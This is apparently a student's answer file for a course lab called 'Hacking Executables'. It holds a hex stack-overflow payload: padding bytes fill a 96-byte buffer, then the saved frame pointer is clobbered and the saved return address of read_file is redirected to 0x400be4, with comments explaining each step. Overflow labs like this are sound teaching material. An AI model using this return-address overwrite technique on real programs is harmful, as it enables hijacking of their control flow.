computing-systems-212 / Lab 3: Hacking Executables / task2 / task2.hex
task2.hex
Raw
00 00 00 00 00 00 00 00 // ----
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 // 96 bytes to fill buf
00 00 00 00 00 00 00 00 // locates the caller-saved lr from where fgetc() stores in c,tok[]
00 00 00 00 00 00 00 00 // overflows to the bottom of the caller where both x29 and lr(x30) are saved to overwrite
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 // ----
00 00 00 00 00 00 00 00 // clobber read_file x29
e4 0b 40 00 00 00 00 00 // redirect read_file stored lr to 0x400be4